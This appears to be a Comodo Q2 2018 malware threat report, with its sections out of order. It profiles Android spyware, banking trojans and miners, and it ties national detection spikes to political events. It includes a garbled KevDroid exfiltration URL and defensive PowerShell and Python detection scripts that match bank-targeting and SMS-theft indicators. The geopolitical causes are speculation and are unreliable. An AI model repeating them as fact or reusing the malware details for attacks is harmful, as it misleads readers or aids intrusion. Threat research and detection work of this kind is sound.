Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, which is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to “kill” it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information but merely to have fun at the victim’s expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
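Two of the Elex behaviours described above, run-at-startup entries and changed DNS settings, leave artefacts that are cheap to enumerate on a Windows host. As an added example that is not part of the Comodo report, this PowerShell lists autostart entries with the signature status of their targets and flags any resolver not on a trusted list; the trusted resolver addresses are an assumption, so substitute those your DHCP or group policy actually assigns.

```powershell
# Added example, not from the Comodo report: enumerate autostart entries and DNS
# client settings, the host artefacts the report says Elex-class software tampers with.
# Windows PowerShell 5.1+ on Windows 8 / Server 2012 or later (for Get-DnsClientServerAddress).

$TrustedDnsServers = @('10.0.0.53', '10.0.1.53')   # assumption: your corporate resolvers

function Get-TargetSignatureStatus([string]$Command) {
    # Pull the first quoted or unquoted file path out of a Run-key command line and
    # report its Authenticode status; Elex-style droppers are rarely signed by a trusted CA.
    $m = [regex]::Match($Command, '^\s*"?([^"]+?\.(exe|dll|cmd|bat|vbs|js|ps1|lnk))"?', 'IgnoreCase')
    if (-not $m.Success) { return 'no-file-path' }
    $path = [Environment]::ExpandEnvironmentVariables($m.Groups[1].Value)
    if (-not (Test-Path -LiteralPath $path)) { return 'file-missing' }
    (Get-AuthenticodeSignature -FilePath $path).Status.ToString()
}

function Get-AutostartEntries {
    # Run/RunOnce keys for the machine (including the 32-bit view) and the current user,
    # plus the per-user and all-users Startup folders.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($p in $item.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath etc. are not registry values
            [pscustomobject]@{
                Source    = $key
                Name      = $p.Name
                Command   = [string]$p.Value
                Signature = Get-TargetSignatureStatus ([string]$p.Value)
            }
        }
    }
    $folders = @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))
    foreach ($f in $folders) {
        if (-not (Test-Path $f)) { continue }
        foreach ($file in Get-ChildItem -Path $f -File) {
            [pscustomobject]@{ Source = $f; Name = $file.Name; Command = $file.FullName
                               Signature = Get-TargetSignatureStatus $file.FullName }
        }
    }
}

function Get-UnexpectedDnsServers {
    # Any IPv4 resolver configured on an adapter that is not on the trusted list.
    Get-DnsClientServerAddress -AddressFamily IPv4 | ForEach-Object {
        foreach ($srv in $_.ServerAddresses) {
            if ($TrustedDnsServers -notcontains $srv) {
                [pscustomobject]@{ Interface = $_.InterfaceAlias; DnsServer = $srv }
            }
        }
    }
}

Write-Host '== Autostart entries (entries without a valid signature listed first) =='
Get-AutostartEntries | Sort-Object { $_.Signature -eq 'Valid' } | Format-Table -AutoSize
Write-Host '== DNS servers not on the trusted list =='
Get-UnexpectedDnsServers | Format-Table -AutoSize
```

An unsigned or missing autostart target is a triage lead, not a verdict; compare the path and publisher against what you expect to be installed before acting on it.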
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and “system optimizers”.
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. Such programs are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.
Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and to provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.
VISIT COMODO.COM
NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to come back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contacts, id, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers’ server: httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim’s every phone call, then encrypts and uploads it to the cybercriminals’ server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim’s activity, then sends the video to the attackers’ server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App, but when a user downloaded and ran it, the app covertly connected to the cybercriminals’ Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware’s dissemination was social networks.
- Version-1: Dardesh (Google Play Services / Instant Apps)
- Version-2: Settings

Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:
- Version-1: Telegram Groups انتخاب دھم
- Version-2: Postrall Yes For Referendum انتخاب دھم
- Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
- Version-4: VPN Easy DroFirewall m_android

Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:
- Extracts photos, audio and videos
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy

Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it has a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message database and the related keys
- Uploads the collected data to the cybercriminals' server via FTP
4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: Facebook, Chrome

Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check whether the following banking applications are present: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Keep Wi-Fi always turned on

Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App | Distribution
FlexiSpy | MBackup
HelloSpy | ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy | 随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and Mobile Spy.
4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 licence".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injector class
4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects the available information from the infected device and sends it to its C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:
- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some apps and websites, including Google Chrome, the Google Play store, Gmail and YouTube.
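The package-name checks that Xloader and RedAlert perform (listed above) are static indicators an analyst can pivot on before running a sample. The following triage script is an added example and not code from the Comodo report: it unpacks an APK, pulls printable ASCII strings from the DEX and UTF-16LE strings from the binary AndroidManifest.xml, and reports which family's target list and which SMS/call permissions appear in the package. The target lists are the report's with dots restored (FakeSpy's entries are left out because the report prints them only as vendor-style names); the sample APK, its package name com.sample.loader and the URL update.example.invalid are constructed for the demonstration.

```python
import io
import re
import zipfile

# Package names the report lists as the banking apps each family checks for
# (dots restored). Real target lists change from campaign to campaign.
TARGETS = {
    "Xloader": {
        "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
        "com.sc.danb.scbankapp", "com.shinhan.sbanking",
        "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
        "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    },
    "RedAlert": {"de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android"},
}
# Permissions that the SMS theft, call recording and overlay behaviour described above need.
RISKY_PERMISSIONS = {
    "android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
    "android.permission.SEND_SMS", "android.permission.READ_CALL_LOG",
    "android.permission.RECORD_AUDIO", "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.BIND_DEVICE_ADMIN",
}

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
# The compiled AndroidManifest.xml keeps its string pool as UTF-16LE, so an
# ASCII scan alone never sees the permission names.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def extract_strings(blob: bytes) -> set:
    found = {m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)}
    found |= {m.group().decode("utf-16le") for m in UTF16_RUN.finditer(blob)}
    return found


def triage_apk(apk_bytes: bytes) -> dict:
    strings = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if name == "AndroidManifest.xml" or (name.startswith("classes") and name.endswith(".dex")):
                strings |= extract_strings(z.read(name))
    # Substring match: DEX string_data_items carry a ULEB128 length prefix, so a
    # printable-run scanner may glue a leading byte onto a string; containment tolerates that.
    hits = {fam: sorted(p for p in pkgs if any(p in s for s in strings)) for fam, pkgs in TARGETS.items()}
    hits = {fam: pkgs for fam, pkgs in hits.items() if pkgs}
    perms = sorted(p for p in RISKY_PERMISSIONS if any(p in s for s in strings))
    if hits and any(p.endswith("_SMS") for p in perms):
        verdict = "likely banking trojan"
    elif hits or perms:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    return {
        "families": sorted(hits),
        "targeted_banks": sorted(p for pkgs in hits.values() for p in pkgs),
        "risky_permissions": perms,
        "verdict": verdict,
    }


def build_sample_apk() -> bytes:
    """Constructed APK: a stub DEX and a fake binary manifest, no real bytecode."""
    dex = b"dex\n035\0" + b"\0" * 24 + b"\0".join([
        b"Lcom/sample/loader/MainActivity;",
        b"com.kbstar.kbbank",
        b"com.wooribank.pib.smart",
        b"http://update.example.invalid/gate.php",
        b"Lcom/sample/loader/SmsReceiver;",
    ]) + b"\0"
    manifest = b"\x03\x00\x08\x00" + b"\0\0".join(s.encode("utf-16le") for s in [
        "com.sample.loader",
        "android.permission.RECEIVE_SMS",
        "android.permission.SEND_SMS",
    ]) + b"\0\0"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", manifest)
        z.writestr("classes.dex", dex)
        z.writestr("res/drawable/icon.png", b"\x89PNG\r\n\x1a\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_apk(build_sample_apk()))
```

For a real sample, replace build_sample_apk() with the bytes of the APK under analysis; a proper DEX/AXML parser such as androguard gives exact strings, but the regex scan above is enough to decide which samples deserve a closer look.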
4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot Reccoder-Call QRCodeBar Scanner APK Let me love you ringtone Iphone Ringtone Night light Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected device to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If you tap this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April 2018 (chart)

4.2.2 May 2018

Android-targeted malware in May 2018 (chart)

4.2.3 June 2018

Android-targeted malware in June 2018 (chart)
5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms

